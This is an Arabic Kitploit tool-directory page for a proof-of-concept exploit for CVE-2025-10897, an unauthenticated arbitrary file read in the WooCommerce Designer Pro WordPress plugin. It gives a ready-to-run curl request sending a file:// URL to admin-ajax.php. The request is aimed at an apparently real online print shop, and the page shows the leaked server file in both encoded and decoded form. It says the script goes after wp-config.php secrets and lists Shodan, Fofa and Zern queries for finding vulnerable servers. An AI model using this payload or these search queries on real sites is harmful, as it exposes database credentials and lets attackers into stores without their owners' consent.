Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-10897 — WooCommerce Designer Pro <= 1.9.28 - قراءة ملفات عشوائية بدون مصادقة | Kitploit
أدوات/GitHubGitHub/error-inside/cve-2025-10897
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتجمع المعلوماتأمن الويباختبار الاختراق
GitHuberror-inside/cve-2025-10897

CVE-2025-10897

WooCommerce Designer Pro <= 1.9.28 - قراءة ملفات عشوائية بدون مصادقة

عرض المستودع
منذ 18 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-10897

Python CVSS License Educational

WooCommerce هو إضافة تجارة إلكترونية مفتوحة المصدر لـ WordPress تحوّل المواقع إلى متاجر عبر الإنترنت. WooCommerce Designer Pro هي إضافة WordPress مطوَّرة بواسطة JMA Plugins تتيح للعملاء تصميم وتخصيص المنتجات مباشرةً على متاجر WooCommerce.

مهم: WooCommerce وWooCommerce Designer Pro مختلفتان تمامًا.

يدعم WooCommerce Designer Pro إنشاء بطاقات الأعمال، والبطاقات البريدية، والنشرات، والملصقات، والتيشيرتات، والملصقات اللاصقة، وغيرها من المواد القابلة للطباعة، مع ميزات مثل دعم ألوان CMYK، وتوليد ملفات PDF، وواجهة تصميم قائمة على اللوحة (Canvas). تتكامل الإضافة مع WooCommerce للسماح بتخصيص المنتجات في الوقت الفعلي قبل الشراء، مما يجعلها مناسبة لأعمال الطباعة عبر الإنترنت ومتاجر المنتجات المخصصة.

CVE-2025-10897 هي ثغرة قراءة ملفات تعسفية بدون مصادقة في WooCommerce Designer Pro حتى الإصدار 1.9.28 (CWE-22). يرسل المهاجم طلب POST /wp-admin/admin-ajax.php مع action=wcdp_convert_resource_cmyk وعنوان URL بصيغة file:// يشير إلى ملفات الخادم مثل /etc/passwd أو wp-config.php. تعيد الإضافة محتويات الملف في استجابة JSON. وهذا يمكن أن يسرّب كلمات مرور قاعدة البيانات وأسرارًا أخرى من wp-config.php دون الحاجة إلى أي حساب WordPress.

إثبات المفهوم

الطلب

root@kitploit:~
curl -sk -X POST 'https://www.procolorprints.ca/wp-admin/admin-ajax.php' \
  -H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Accept: */*' \
  -H 'Connection: close' \
  -d 'action=wcdp_convert_resource_cmyk&url=file:///etc/os-release'

الاستجابة

root@kitploit:~
{"string":"data:image\/jpg;base64,TkFNRT0iQWxtYUxpbnV4IgpWRVJTSU9OPSI5LjggKE9saXZlIEphZ3VhcikiCklEPSJhbG1hbGludXgiCklEX0xJS0U9InJoZWwgY2VudG9zIGZlZG9yYSIKVkVSU0lPTl9JRD0iOS44IgpQTEFURk9STV9JRD0icGxhdGZvcm06ZWw5IgpQUkVUVFlfTkFNRT0iQWxtYUxpbnV4IDkuOCAoT2xpdmUgSmFndWFyKSIKQU5TSV9DT0xPUj0iMDszNCIKTE9HTz0iZmVkb3JhLWxvZ28taWNvbiIKQ1BFX05BTUU9ImNwZTovbzphbG1hbGludXg6YWxtYWxpbnV4Ojk6OmJhc2VvcyIKSE9NRV9VUkw9Imh0dHBzOi8vYWxtYWxpbnV4Lm9yZy8iCkRPQ1VNRU5UQVRJT05fVVJMPSJodHRwczovL3dpa2kuYWxtYWxpbnV4Lm9yZy8iCkJVR19SRVBPUlRfVVJMPSJodHRwczovL2J1Z3MuYWxtYWxpbnV4Lm9yZy8iCgpBTE1BTElOVVhfTUFOVElTQlRfUFJPSkVDVD0iQWxtYUxpbnV4LTkiCkFMTUFMSU5VWF9NQU5USVNCVF9QUk9KRUNUX1ZFUlNJT049IjkuOCIKUkVESEFUX1NVUFBPUlRfUFJPRFVDVD0iQWxtYUxpbnV4IgpSRURIQVRfU1VQUE9SVF9QUk9EVUNUX1ZFUlNJT049IjkuOCIKU1VQUE9SVF9FTkQ9MjAzMi0wNi0wMQo=","success":true}

الاستجابة بعد فك ترميز Base64:

root@kitploit:~
NAME="AlmaLinux"
VERSION="9.8 (Olive Jaguar)"
ID="almalinux"
ID_LIKE="rhel centos fedora"
VERSION_ID="9.8"
PLATFORM_ID="platform:el9"
PRETTY_NAME="AlmaLinux 9.8 (Olive Jaguar)"
ANSI_COLOR="0;34"
LOGO="fedora-logo-icon"
CPE_NAME="cpe:/o:almalinux:almalinux:9::baseos"
HOME_URL="https://almalinux.org/"
DOCUMENTATION_URL="https://wiki.almalinux.org/"
BUG_REPORT_URL="https://bugs.almalinux.org/"

ALMALINUX_MANTISBT_PROJECT="AlmaLinux-9"
ALMALINUX_MANTISBT_PROJECT_VERSION="9.8"
REDHAT_SUPPORT_PRODUCT="AlmaLinux"
REDHAT_SUPPORT_PRODUCT_VERSION="9.8"
SUPPORT_END=2032-06-01

الاستخدام

root@kitploit:~
python CVE-2025-10897-X7.py

ملاحظة: يحاول سكربت إثبات المفهوم الخاص بنا الحصول على wp-config.php، ولكن قد يكون الهدف قد ثبّت WordPress في مكان مختلف عن /var/www.

وسائط البحث عن الخوادم المعرضة للثغرات

  • Zern : body:"wc-designer-pro"
  • Fofa : body="wc-designer-pro"
  • Shodan : http.body:"wc-designer-pro"

الموارد

  • OpenCVE - WooCommerce Designer Pro <= 1.9.28 قراءة ملفات تعسفية بدون مصادقة
  • NIST - تفاصيل CVE-2025-10897
  • الصفحة الرئيسية لـ WooCommerce
  • WooCommerce Designer Pro - الموقع الرسمي للمطورين
  • WooCommerce Designer Pro - السوق الرسمي
  • قالب Nuclei - CVE-2025-10897

إخلاء المسؤولية

هذا المستودع ومحتوياته مُقدَّمة بدقة لأغراض أبحاث الأمان المشروعة، واختبار الاختراق المصرح به، والدراسة التعليمية، والأغراض الدفاعية. بوصولك إلى هذه المواد أو استخدامها، فإنك تقر بالمسؤولية الكاملة عن ضمان امتثال أنشطتك لجميع القوانين المعمول بها، وحصولك على التفويض المناسب قبل اختبار هذه التقنيات أو تطبيقها على أي نظام لا تملكه.

لا يتحمل مؤلفو هذا المشروع والقائمون عليه أي مسؤولية عن أي أضرار أو عواقب قانونية أو إساءة استخدام ناتجة عن تطبيق هذه المعلومات. أي استخدام للوصول غير المصرح به أو الأنشطة الخبيثة أو الأغراض غير القانونية محظور صراحةً وغير مدعوم.

استخدم بمسؤولية. التزم بالقانون. اختبر فقط ما تملكه أو لديك إذن كتابي صريح لاختباره.

المؤلفون

  • ErrorInside // SCT

الترخيص

SCT-PL

تنزيل الأداة